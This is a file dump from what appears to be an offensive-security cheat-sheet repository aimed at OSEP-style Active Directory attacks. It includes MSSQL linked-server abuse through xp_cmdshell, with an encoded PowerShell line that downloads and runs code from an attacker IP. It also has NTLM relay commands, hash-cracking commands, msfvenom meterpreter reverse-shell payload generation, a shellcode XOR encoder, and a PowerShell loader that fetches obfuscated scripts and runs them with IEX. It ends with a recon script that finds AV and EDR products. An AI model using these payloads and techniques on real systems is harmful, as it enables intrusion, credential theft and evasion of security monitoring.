| # Enumerate if user is member of Public or Sysadmin. If role is one then true. 338 | SELECT IS_SRVROLEMEMBER('public'); 339 | SELECT IS_SRVROLEMEMBER('sysadmin'); 340 | 341 | # Force NTLM authentication for hash-grabbing or relaying 342 | EXEC master..xp_dirtree "\192.168.49.67\share" 343 | impacket-ntlmrelayx.py -smb2support -t 10.10.10.1 -c 'whoami /all' -debug 344 | 345 | # Get logins that we can impersonate 346 | SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'; 347 | 348 | # Impersonate login and get login information 349 | EXECUTE AS LOGIN = 'sa'; 350 | use msdb; EXECUTE AS USER = 'dbo'; 351 | 352 | # Impersonate dbo in trusted database and execute through 'xp_cmdshell' 353 | use msdb; EXECUTE AS USER = 'dbo'; 354 | EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; 355 | EXEC xp_cmdshell 'whoami'; 356 | 357 | # Impersonate dbo in trusted database and execute through 'sp_OACreate' 358 | use msdb; EXECUTE AS USER = 'dbo'; 359 | EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE; 360 | DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null, 'whoami'; 361 | 362 | ######## 363 | # Enumerate linked servers 364 | ######## 365 | EXEC sp_linkedservers; 366 | Linked SQL server: DC01 367 | 368 | 369 | ######### 370 | # Execute on linked server 371 | ######### 372 | EXECUTE AS LOGIN = 'sa'; 373 | EXEC sp_serveroption 'SQL03', 'rpc out', 'true'; 374 | EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT SQL03; 375 | EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT SQL03; 376 | EXEC ('xp_cmdshell ''whoami'';') AT SQL03; 377 | EXEC ('xp_cmdshell ''powershell.exe -exec bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAOQAuADUANwAvAFYAZQByAGkAZgBpAGUAZAAvAHAAcwAvAG4AYwAuAHQAeAB0ACcAKQA7AA=='';') AT SQL03; 378 | 379 | ############ 380 | # Execute on linked server via 'openquery' 381 | ############ 382 | select version from openquery("dc01", 'select @@version as version') 383 | select 1 from openquery("dc01", 'select 1; EXEC sp_configure ''show advanced options'', 1; reconfigure') 384 | select 1 from openquery("dc01", 'select 1; EXEC sp_configure ''xp_cmdshell'', 1; reconfigure') 385 | select 1 from openquery("dc01", 'select 1; exec xp_cmdshell '"powershell whoami"') 386 | select * from openquery("sql03",'exec master..xp_cmdshell "powershell whoami"') 387 | 388 | ############ 389 | # Escalate via double database linkedString 390 | ############## 391 | 392 | # Enabling advanced options on appsrv01 using AT 393 | EXEC ('EXEC (''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT appsrv01') AT dc01 394 | 395 | # Find the login on DC01 396 | select mylogin from openquery("dc01", 'select SYSTEM_USER as mylogin'); 397 | 398 | # Finding the login on APPSRV01 after following the links 399 | select mylogin from openquery("dc01", 'select mylogin from openquery("appsrv01", ''select SYSTEM_USER as mylogin'')') 400 | 401 | select * from openquery("dc01", 'select * from openquery("appsrv01", ''select (SYSTEM_USER)'')') 402 | EXEC ('EXEC (''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT appsrv01') AT dc01 403 | EXEC ('EXEC (''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT appsrv01') AT dc01 404 | EXEC ('EXEC (''xp_cmdshell ''''whoami /priv'''';'') AT appsrv01') AT dc01 405 | 406 | 407 | ############################## 408 | Powerup SQL 409 | ############################## 410 | # Find sql servers 411 | Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose 412 | 413 | # Audit the SQL instance 414 | Invoke-SQLAudit -Verbose -Instance SQLServer1 415 | 416 | # Privielge Esclate using powerupsql. 417 | Invoke-SQLEscalatePriv -Verbose -Instance SQLServer1 418 | 419 | # Get linked servers. 420 | Get-SQLServerLinkCrawl -Instance web06 421 | 422 | Executing Commands 423 | Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami' 424 | 425 | Get-SQLQuery -Verbose -Instance "web06.dev.final.com" -Query "EXEC sp_serveroption 'SQL03', 'rpc out', 'true';" 426 | Get-SQLQuery -Verbose -Instance "web06.dev.final.com" -Query "EXEC sp_serveroption 'SQL03', 'rpc', 'true';" 427 | 428 | 429 | 430 | 431 | ############################################## 432 | Cracking 433 | ############################################# 434 | 435 | # Cracking Net NTLMv2 HASH 436 | hashcat -m 5600 hash.txt dic.txt --force 437 | 438 | # Cracking Kerberoasting, getuserspn, tgs files 439 | hashcat -m 13100 --force 440 | john --format=krb5tgs --wordlist= 441 | 442 | # Cracking ssh private key password. 443 | /usr/share/john/ssh2john.py id_rsa.johny > sshhash.txt 444 | john sshhash.txt --wordlist=/usr/share/wordlists/rockyou.txt 445 | 446 | 447 | # Cracking Ansible 448 | ansible2john test.yml 449 | hashcat testhash.txt --force --hash-type=16900 450 | cat pw.txt | ansible-vault decrypt 451 | 452 | 453 | # Bcyrpt 454 | sudo john derbyhash.txt --wordlist=/usr/share/wordlists/rockyou.txt 455 | 456 | 457 | 458 | 459 | .........................................MSF CONSOLE................................................... 460 | 461 | 462 | Paylaod Generator: reverse_https:raw 463 | msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.57 LPORT=443 -f raw StagerVerifySSLCert=true handlersslcert=/mnt/hgfs/Shared_Folder/OSEP-CHEATGEN/kali-generator/msf_tmp/certificate_msfvenom.pem -o /mnt/hgfs/Shared_Folder/OSEP-CHEATGEN/kali-generator/msf_tmp/reverse_https.raw 464 | Paylaod Generator: reverse_tcp:raw 465 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.49.57 LPORT=443 -f raw -o /mnt/hgfs/Shared_Folder/OSEP-CHEATGEN/kali-generator/msf_tmp/reverse_tcp.raw 466 | 467 | 468 | -------------XML_Payloard------------ 469 | 470 | 471 | 472 | 473 | -------------XML_Payloard------------ 474 | 475 | 476 | -------------------------------------------------------------------------------- /kali-generator/todo.txt: -------------------------------------------------------------------------------- 1 | # Refrences 2 | https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet 3 | https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a 4 | https://github.com/ksecurity45/OSEP 5 | https://github.com/ksecurity45/OSEP/blob/main/commands-nav.md 6 | https://0xsp.com/offensive/red-ops-techniques/red-team-cheatsheet 7 | https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview 8 | https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 9 | 10 | 11 | https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound-all-flags.html 12 | 13 | 14 | # Hints to check for. 15 | 1. User Hunting. 16 | 2. RestrictedAdmin 17 | 3. Kerberoast. 18 | 4. ASREPRoast. 19 | 5. Password Spray Attack 20 | 6. Hunt for SPN accounts because they can request a TGS. 21 | 7. Force Set SPN 22 | 8. Unconstrained Delegation 23 | 9. constrained Delegation 24 | 10. Resource Based Constrained Delegation 25 | 11. Relay attack (NTLM RELAY) 26 | 12. Abusing Printer_bug (Spoolsample) Breaking Forest Trusts 27 | 13. Abusing ACLs 28 | 14. Abuse MSSQL Servers 29 | 30 | # Encrypt Powershell 31 | ./xor-ps1-script.sh SharpHound.txt 32 | 33 | 34 | jq '. | map_values(keys)' | grep -v lnk -------------------------------------------------------------------------------- /kali-generator/xor.py: -------------------------------------------------------------------------------- 1 | 2 | import argparse 3 | from ast import Bytes 4 | from collections import namedtuple 5 | import sys 6 | import ctypes 7 | 8 | 9 | def format_sc(sc): 10 | """Format the shellcode for pasting in C/C++, C#, Java, or Visual Basic projects. 11 | Takes shellcode as bytes, returns formatted bytes. 12 | """ 13 | 14 | sc = ["{0:#0{1}x}".format(int(x),4) for x in sc] 15 | 16 | CodeFormat = namedtuple('CodeFormat', 'open close heading items_per_line func') 17 | 18 | cf = CodeFormat(open='{\n', close='\n};', heading='byte[] shellcode = ', items_per_line=12, func=None) 19 | 20 | if cf.func: 21 | sc = cf.func 22 | 23 | iterations = (len(sc) // cf.items_per_line) if len(sc) % cf.items_per_line == 0 else (len(sc) // cf.items_per_line + 1) 24 | 25 | iteration = 0 26 | index = [0, cf.items_per_line] 27 | lines = [] 28 | 29 | while iteration < iterations: 30 | line = ', '.join(sc[index[0]:index[1]]) 31 | lines.append(line) 32 | index[0] = index[1] 33 | index[1] = index[1] + cf.items_per_line 34 | iteration += 1 35 | 36 | sc = ',\n'.join(lines) 37 | sc = cf.heading + cf.open + sc + cf.close 38 | 39 | return sc.encode() 40 | 41 | parser = argparse.ArgumentParser() 42 | parser.add_argument('-i', '--inputfile', 43 | help='File containing shellcode or read from ') 44 | 45 | parser.add_argument('-o', '--outputfile', 46 | help='Output file name') 47 | 48 | 49 | args = parser.parse_args() 50 | 51 | filename = args.inputfile 52 | 53 | with open(filename,"rb") as f: 54 | buff = f.read() 55 | 56 | def xor(buff): 57 | encoded = [None] * len(buff) 58 | for i in range(0,len(buff)): 59 | encoded[i] = ((( buff[i] + 3) ^ 0xAA) & 0xFF) 60 | 61 | 62 | return encoded 63 | 64 | e_buff = xor(buff) 65 | 66 | 67 | # //encoded[i] = (byte)((((uint) buf[i] + 3) ^ 0xAA) & 0xFF); //Encrypter 68 | # encoded[i] = (byte)((((uint)buf[i] ^ 0xAA) - 3) & 0xFF); //Decrypter 69 | output = args.outputfile 70 | with open(output,"wb") as of: 71 | of.write(format_sc(e_buff)) 72 | 73 | 74 | -------------------------------------------------------------------------------- /kali-generator/xor_ps/xor-ps1-script.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | 4 | 5 | current_dir=$(dirname $(readlink -f $0)) 6 | 7 | IP=$(ip a show tun0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}') 8 | KEY=$(openssl rand -base64 32 | tr -d '/=+[0-9]' | cut -c -25) 9 | INFILE="/mnt/hgfs/Shared_Folder/Verified/ps/$1" 10 | OUTFILE="$KEY.obf" 11 | 12 | if [ "${INFILE: -4}" == ".ps1" ] || [ "${INFILE: -4}" == ".txt" ]; then 13 | # remove BOM using sed as PowerShell is allergic to it and will not execute our code if it's still there 14 | msfvenom -p - --encrypt xor --encrypt-key "$KEY" -a x64 --platform windows -f raw < <(sed '1s/^\xEF\xBB\xBF//' < "$INFILE") >"/mnt/hgfs/Shared_Folder/Verified/ps_obf/$OUTFILE" 15 | else 16 | msfvenom -p - --encrypt xor --encrypt-key "$KEY" -a x64 --platform windows -f raw <"$INFILE" >"/mnt/hgfs/Shared_Folder/Verified/ps_obf/$OUTFILE" 17 | fi 18 | 19 | echo -e "\n# $1" 20 | sed -e "s/KALIIP/$IP/" \ 21 | -e "s/KEY/$KEY/g" \ 22 | -e "s/OUTFILE/$OUTFILE/" \ 23 | "$current_dir/xor-template.ps1" \ 24 | | tr -d '\n' -------------------------------------------------------------------------------- /kali-generator/xor_ps/xor-template.ps1: -------------------------------------------------------------------------------- 1 | $KEY0 = 'KEY'; 2 | $KEY = (New-Object System.Net.WebClient).DownloadData('http://KALIIP/Verified/obf/OUTFILE'); 3 | for ($i = 0; $i -lt $KEY.Length; $i++) { $KEY[$i] = $KEY[$i] -bxor $KEY0[$i % $KEY0.Length]; }; 4 | [System.Text.Encoding]::UTF8.GetString($KEY) | IEX -------------------------------------------------------------------------------- /new/1.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/new/1.doc -------------------------------------------------------------------------------- /new/1.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | 9 | 10 | 11 | 14 | 15 | -------------------------------------------------------------------------------- /new/1.xsl: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /new/payload.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 14 | 15 | 16 | 17 | 118 | 119 | 120 | 121 | 122 | -------------------------------------------------------------------------------- /new/payload.xsl: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /new/payload_lab.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 14 | 15 | 16 | 17 | 117 | 118 | 119 | 120 | -------------------------------------------------------------------------------- /nmap/nmap-7.92-win32.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/nmap/nmap-7.92-win32.zip -------------------------------------------------------------------------------- /nmap/npcap-1.60.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/nmap/npcap-1.60.exe -------------------------------------------------------------------------------- /ps/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/ADCheatgen/6a74632b56487f3645dc535f30eac5cc2233fdad/ps/.DS_Store -------------------------------------------------------------------------------- /ps/HostRecon.txt: -------------------------------------------------------------------------------- 1 | function Invoke-HostRecon{ 2 | 3 | <# 4 | 5 | .SYNOPSIS 6 | 7 | This function runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase. It gathers information about the local system, users, and domain information. It does not use any 'net', 'ipconfig', 'whoami', 'netstat', or other system commands to help avoid detection. 8 | 9 | HostRecon Function: Invoke-HostRecon 10 | Author: Beau Bullock (@dafthack) with credit to Joff Thyer (@joff_thyer) for the portscan module. 11 | License: BSD 3-Clause 12 | Required Dependencies: None 13 | Optional Dependencies: None 14 | 15 | .DESCRIPTION 16 | 17 | This function runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase. It gathers information about the local system, users, and domain information. It does not use any 'net', 'ipconfig', 'whoami', 'netstat', or other system commands to help avoid detection. 18 | 19 | .PARAMETER Portscan 20 | 21 | If this flag is added an outbound portscan will be initiated from the target system to allports.exposed. The top 50 ports as specified by the Nmap project will be scanned. This is useful in determining any egress filtering in use. 22 | 23 | .PARAMETER TopPorts 24 | 25 | This flag specifies the number of "top ports" to be scanned outbound from the system. Valid entries are 1-128. Default is 50. 26 | 27 | .Example 28 | 29 | C:\PS> Invoke-HostRecon 30 | 31 | Description 32 | ----------- 33 | This command will run a number of checks on the local system including the retrieval of local system information (netstat, common security products, scheduled tasks, local admins group, LAPS, etc), and domain information (Domain Admins group, DC's, password policy). 34 | 35 | .Example 36 | 37 | C:\PS> Invoke-HostRecon -Portscan -TopPorts 128 38 | 39 | Description 40 | ----------- 41 | This command will run a number of checks on the local system including the retrieval of local system information (netstat, common security products, scheduled tasks, local admins group, LAPS, etc), and domain information (Domain Admins group, DC's, password policy). Additionally, it will perform an outbound portscan on the top 128 ports to allports.exposed to assist in determining any ports that might be allowed outbound for C2 communications. 42 | 43 | #> 44 | 45 | Param( 46 | 47 | [Parameter(Position = 0, Mandatory = $false)] 48 | [switch] 49 | $Portscan, 50 | 51 | [Parameter(Position = 1, Mandatory = $false)] 52 | [string] 53 | $TopPorts = "50", 54 | 55 | [Parameter(Position = 2, Mandatory = $false)] 56 | [switch] 57 | $DisableDomainChecks = $false, 58 | 59 | [ValidateRange(1,65535)][String[]]$Portlist = "" 60 | 61 | ) 62 | 63 | #Hostname 64 | 65 | Write-Output "[*] Hostname" 66 | $Computer = $env:COMPUTERNAME 67 | $Computer 68 | Write-Output "`n" 69 | 70 | #IP Information 71 | 72 | Write-Output "[*] IP Address Info" 73 | $ipinfo = Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = True'| Select-Object IPAddress,Description | Format-Table -Wrap | Out-String 74 | $ipinfo 75 | Write-Output "`n" 76 | 77 | #Current user and domain 78 | 79 | Write-Output "[*] Current Domain and Username" 80 | 81 | $currentuser = $env:USERNAME 82 | Write-Output "Domain = $env:USERDOMAIN" 83 | Write-Output "Current User = $env:USERNAME" 84 | Write-Output "`n" 85 | 86 | #All local users 87 | 88 | Write-Output "[*] Local Users of this system" 89 | $locals = Get-WmiObject -Class Win32_UserAccount -Filter "LocalAccount='True'" | Select-Object Name 90 | $locals 91 | Write-Output "`n" 92 | 93 | #Local Admins group 94 | 95 | Write-Output "[*] Local Admins of this system" 96 | $Admins = Get-WmiObject win32_groupuser | Where-Object { $_.GroupComponent -match 'administrators' -and ($_.GroupComponent -match "Domain=`"$env:COMPUTERNAME`"")} | ForEach-Object {[wmi]$_.PartComponent } | Select-Object Caption,SID | format-table -Wrap | Out-String 97 | $Admins 98 | Write-Output "`n" 99 | 100 | #Netstat Information 101 | #Some code here borrowed from: http://techibee.com/powershell/query-list-of-listening-ports-in-windows-using-powershell/2344 102 | Write-Output "[*] Active Network Connections" 103 | $TCPProperties = [System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties() 104 | $Connections = $TCPProperties.GetActiveTcpConnections() 105 | $objarray = @() 106 | foreach($Connection in $Connections) { 107 | if($Connection.LocalEndPoint.AddressFamily -eq "InterNetwork" ) { $IPType = "IPv4" } else { $IPType = "IPv6" } 108 | $OutputObj = New-Object -TypeName PSobject 109 | $OutputObj | Add-Member -MemberType NoteProperty -Name "LocalAddress" -Value $Connection.LocalEndPoint.Address 110 | $OutputObj | Add-Member -MemberType NoteProperty -Name "LocalPort" -Value $Connection.LocalEndPoint.Port 111 | $OutputObj | Add-Member -MemberType NoteProperty -Name "RemoteAddress" -Value $Connection.RemoteEndPoint.Address 112 | $OutputObj | Add-Member -MemberType NoteProperty -Name "RemotePort" -Value $Connection.RemoteEndPoint.Port 113 | $OutputObj | Add-Member -MemberType NoteProperty -Name "State" -Value $Connection.State 114 | $OutputObj | Add-Member -MemberType NoteProperty -Name "IPV4Or6" -Value $IPType 115 | $objarray += $OutputObj 116 | } 117 | $activeconnections = $objarray | Format-Table -Wrap | Out-String 118 | $activeconnections 119 | 120 | Write-Output "[*] Active TCP Listeners" 121 | $ListenConnections = $TCPProperties.GetActiveTcpListeners() 122 | $objarraylisten = @() 123 | foreach($Connection in $ListenConnections) { 124 | if($Connection.address.AddressFamily -eq "InterNetwork" ) { $IPType = "IPv4" } else { $IPType = "IPv6" } 125 | $OutputObjListen = New-Object -TypeName PSobject 126 | $OutputObjListen | Add-Member -MemberType NoteProperty -Name "LocalAddress" -Value $connection.Address 127 | $OutputObjListen | Add-Member -MemberType NoteProperty -Name "ListeningPort" -Value $Connection.Port 128 | $OutputObjListen | Add-Member -MemberType NoteProperty -Name "IPV4Or6" -Value $IPType 129 | $objarraylisten += $OutputObjListen } 130 | $listeners = $objarraylisten | Format-Table -Wrap | Out-String 131 | $listeners 132 | 133 | Write-Output "`n" 134 | 135 | #DNS Cache Information 136 | 137 | Write-Output "[*] DNS Cache" 138 | 139 | try{ 140 | $dnscache = Get-WmiObject -query "Select * from MSFT_DNSClientCache" -Namespace "root\standardcimv2" -ErrorAction stop | Select-Object Entry,Name,Data | Format-Table -Wrap | Out-String 141 | $dnscache 142 | } 143 | catch 144 | { 145 | Write-Output "There was an error retrieving the DNS cache." 146 | } 147 | Write-Output "`n" 148 | 149 | #Shares 150 | 151 | Write-Output "[*] Share listing" 152 | $shares = @() 153 | $shares = Get-WmiObject -Class Win32_Share | Format-Table -Wrap | Out-String 154 | $shares 155 | Write-Output "`n" 156 | 157 | #Scheduled Tasks 158 | 159 | Write-Output "[*] List of scheduled tasks" 160 | $schedule = new-object -com("Schedule.Service") 161 | $schedule.connect() 162 | $tasks = $schedule.getfolder("\").gettasks(0) | Select-Object Name | Format-Table -Wrap | Out-String 163 | If ($tasks.count -eq 0) 164 | { 165 | Write-Output "[*] Task scheduler appears to be empty" 166 | } 167 | If ($tasks.count -ne 0) 168 | { 169 | $tasks 170 | } 171 | Write-Output "`n" 172 | 173 | #Proxy information 174 | 175 | Write-Output "[*] Proxy Info" 176 | $proxyenabled = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings').proxyEnable 177 | $proxyserver = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings').proxyServer 178 | 179 | If ($proxyenabled -eq 1) 180 | { 181 | Write-Output "A system proxy appears to be enabled." 182 | Write-Output "System proxy located at: $proxyserver" 183 | } 184 | Elseif($proxyenabled -eq 0) 185 | { 186 | Write-Output "There does not appear to be a system proxy enabled." 187 | } 188 | Write-Output "`n" 189 | 190 | #Getting AntiVirus Information 191 | 192 | 193 | Write-Output "[*] Checking if AV is installed" 194 | 195 | $AV = Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct" 196 | 197 | If ($AV -ne "") 198 | { 199 | Write-Output "The following AntiVirus product appears to be installed:" $AV.displayName 200 | } 201 | If ($AV -eq "") 202 | { 203 | Write-Output "No AV detected." 204 | } 205 | Write-Output "`n" 206 | 207 | #Getting Local Firewall Status 208 | 209 | Write-Output "[*] Checking local firewall status." 210 | $HKLM = 2147483650 211 | $reg = get-wmiobject -list -namespace root\default -computer $computer | where-object { $_.name -eq "StdRegProv" } 212 | $firewallEnabled = $reg.GetDwordValue($HKLM, "System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile","EnableFirewall") 213 | $fwenabled = [bool]($firewallEnabled.uValue) 214 | 215 | If($fwenabled -eq $true) 216 | { 217 | Write-Output "The local firewall appears to be enabled." 218 | } 219 | If($fwenabled -ne $true) 220 | { 221 | Write-Output "The local firewall appears to be disabled." 222 | } 223 | Write-Output "`n" 224 | 225 | #Checking for Local Admin Password Solution (LAPS) 226 | 227 | Write-Output "[*] Checking for Local Admin Password Solution (LAPS)" 228 | try 229 | { 230 | $lapsfile = Get-ChildItem "$env:ProgramFiles\LAPS\CSE\Admpwd.dll" -ErrorAction Stop 231 | if ($lapsfile) 232 | { 233 | Write-Output "The LAPS DLL (Admpwd.dll) was found. Local Admin password randomization may be in use." 234 | } 235 | } 236 | catch 237 | { 238 | Write-Output "The LAPS DLL was not found." 239 | } 240 | Write-Output "`n" 241 | 242 | #Process Information 243 | 244 | Write-Output "[*] Running Processes" 245 | 246 | $processes = Get-Process | Select-Object ProcessName,Id,Description,Path 247 | $processout = $processes | Format-Table -Wrap | Out-String 248 | $processout 249 | Write-Output "`n" 250 | 251 | #Checking for common security products 252 | 253 | Write-Output "[*] Checking for Sysinternals Sysmon" 254 | try 255 | { 256 | $sysmondrv = Get-ChildItem "$env:SystemRoot\sysmondrv.sys" -ErrorAction Stop 257 | if ($sysmondrv) 258 | { 259 | Write-Output "The Sysmon driver $($sysmondrv.VersionInfo.FileVersion) (sysmondrv.sys) was found. System activity may be monitored." 260 | } 261 | } 262 | catch 263 | { 264 | Write-Output "The Sysmon driver was not found." 265 | } 266 | Write-Output "`n" 267 | 268 | Write-Output "[*] Checking for common security product processes" 269 | $processnames = $processes | Select-Object ProcessName 270 | Foreach ($ps in $processnames) 271 | { 272 | #AV 273 | if ($ps.ProcessName -like "*mcshield*") 274 | { 275 | Write-Output ("Possible McAfee AV process " + $ps.ProcessName + " is running.") 276 | } 277 | if (($ps.ProcessName -like "*windefend*") -or ($ps.ProcessName -like "*MSASCui*") -or ($ps.ProcessName -like "*msmpeng*") -or ($ps.ProcessName -like "*msmpsvc*")) 278 | { 279 | Write-Output ("Possible Windows Defender AV process " + $ps.ProcessName + " is running.") 280 | } 281 | if ($ps.ProcessName -like "*WRSA*") 282 | { 283 | Write-Output ("Possible WebRoot AV process " + $ps.ProcessName + " is running.") 284 | } 285 | if ($ps.ProcessName -like "*savservice*") 286 | { 287 | Write-Output ("Possible Sophos AV process " + $ps.ProcessName + " is running.") 288 | } 289 | if (($ps.ProcessName -like "*TMCCSF*") -or ($ps.ProcessName -like "*TmListen*") -or ($ps.ProcessName -like "*NTRtScan*")) 290 | { 291 | Write-Output ("Possible Trend Micro AV process " + $ps.ProcessName + " is running.") 292 | } 293 | if (($ps.ProcessName -like "*symantec antivirus*") -or ($ps.ProcessName -like "*SymCorpUI*") -or ($ps.ProcessName -like "*ccSvcHst*") -or ($ps.ProcessName -like "*SMC*") -or ($ps.ProcessName -like "*Rtvscan*")) 294 | { 295 | Write-Output ("Possible Symantec AV process " + $ps.ProcessName + " is running.") 296 | } 297 | if ($ps.ProcessName -like "*mbae*") 298 | { 299 | Write-Output ("Possible MalwareBytes Anti-Exploit process " + $ps.ProcessName + " is running.") 300 | } 301 | #if ($ps.ProcessName -like "*mbam*") 302 | # { 303 | # Write-Output ("Possible MalwareBytes Anti-Malware process " + $ps.ProcessName + " is running.") 304 | # } 305 | #AppWhitelisting 306 | if ($ps.ProcessName -like "*Parity*") 307 | { 308 | Write-Output ("Possible Bit9 application whitelisting process " + $ps.ProcessName + " is running.") 309 | } 310 | #Behavioral Analysis 311 | if ($ps.ProcessName -like "*cb*") 312 | { 313 | Write-Output ("Possible Carbon Black behavioral analysis process " + $ps.ProcessName + " is running.") 314 | } 315 | if ($ps.ProcessName -like "*bds-vision*") 316 | { 317 | Write-Output ("Possible BDS Vision behavioral analysis process " + $ps.ProcessName + " is running.") 318 | } 319 | if ($ps.ProcessName -like "*Triumfant*") 320 | { 321 | Write-Output ("Possible Triumfant behavioral analysis process " + $ps.ProcessName + " is running.") 322 | } 323 | if ($ps.ProcessName -like "CSFalcon") 324 | { 325 | Write-Output ("Possible CrowdStrike Falcon EDR process " + $ps.ProcessName + " is running.") 326 | } 327 | #Intrusion Detection 328 | if ($ps.ProcessName -like "*ossec*") 329 | { 330 | Write-Output ("Possible OSSEC intrusion detection process " + $ps.ProcessName + " is running.") 331 | } 332 | #Firewall 333 | if ($ps.ProcessName -like "*TmPfw*") 334 | { 335 | Write-Output ("Possible Trend Micro firewall process " + $ps.ProcessName + " is running.") 336 | } 337 | #DLP 338 | if (($ps.ProcessName -like "dgagent") -or ($ps.ProcessName -like "DgService") -or ($ps.ProcessName -like "DgScan")) 339 | { 340 | Write-Output ("Possible Verdasys Digital Guardian DLP process " + $ps.ProcessName + " is running.") 341 | } 342 | if ($ps.ProcessName -like "kvoop") 343 | { 344 | Write-Output ("Possible Unknown DLP process " + $ps.ProcessName + " is running.") 345 | } 346 | } 347 | Write-Output "`n" 348 | 349 | if ($DisableDomainChecks -eq $false) 350 | { 351 | #Domain Password Policy 352 | 353 | $domain = "$env:USERDOMAIN" 354 | Write-Output "[*] Domain Password Policy" 355 | Try 356 | { 357 | $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext("domain",$domain) 358 | $DomainObject =[System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) 359 | $CurrentDomain = [ADSI]"WinNT://$env:USERDOMAIN" 360 | $Name = @{Name="DomainName";Expression={$_.Name}} 361 | $MinPassLen = @{Name="Minimum Password Length";Expression={$_.MinPasswordLength}} 362 | $MinPassAge = @{Name="Minimum Password Age (Days)";Expression={$_.MinPasswordAge.value/86400}} 363 | $MaxPassAge = @{Name="Maximum Password Age (Days)";Expression={$_.MaxPasswordAge.value/86400}} 364 | $PassHistory = @{Name="Enforce Password History (Passwords remembered)";Expression={$_.PasswordHistoryLength}} 365 | $AcctLockoutThreshold = @{Name="Account Lockout Threshold";Expression={$_.MaxBadPasswordsAllowed}} 366 | $AcctLockoutDuration = @{Name="Account Lockout Duration (Minutes)";Expression={if ($_.AutoUnlockInterval.value -eq -1) {'Account is locked out until administrator unlocks it.'} else {$_.AutoUnlockInterval.value/60}}} 367 | $ResetAcctLockoutCounter = @{Name="Observation Window";Expression={$_.LockoutObservationInterval.value/60}} 368 | $CurrentDomain | Select-Object $Name,$MinPassLen,$MinPassAge,$MaxPassAge,$PassHistory,$AcctLockoutThreshold,$AcctLockoutDuration,$ResetAcctLockoutCounter | format-list | Out-String 369 | 370 | } 371 | catch 372 | { 373 | Write-Output "Error connecting to the domain while retrieving password policy." 374 | 375 | } 376 | Write-Output "`n" 377 | 378 | #Domain Controllers 379 | 380 | Write-Output "[*] Domain Controllers" 381 | Try 382 | { 383 | $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext("domain",$domain) 384 | $DomainObject =[System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) 385 | $DCS = $DomainObject.DomainControllers 386 | foreach ($dc in $DCS) 387 | { 388 | $dc.Name 389 | } 390 | 391 | } 392 | catch 393 | { 394 | Write-Output "Error connecting to the domain while retrieving listing of Domain Controllers." 395 | 396 | } 397 | Write-Output "`n" 398 | 399 | #Domain Admins 400 | 401 | Write-Output "[*] Domain Admins" 402 | Try 403 | { 404 | $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext("domain",$domain) 405 | $DomainObject =[System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) 406 | 407 | $DAgroup = ([adsi]"WinNT://$domain/Domain Admins,group") 408 | $Members = @($DAgroup.psbase.invoke("Members")) 409 | [Array]$MemberNames = $Members | ForEach{([ADSI]$_).InvokeGet("Name")} 410 | $MemberNames 411 | } 412 | catch 413 | { 414 | Write-Output "Error connecting to the domain while retrieving Domain Admins group members." 415 | 416 | } 417 | Write-Output "`n" 418 | } 419 | If($Portscan) 420 | { 421 | if ($Portlist -ne "") 422 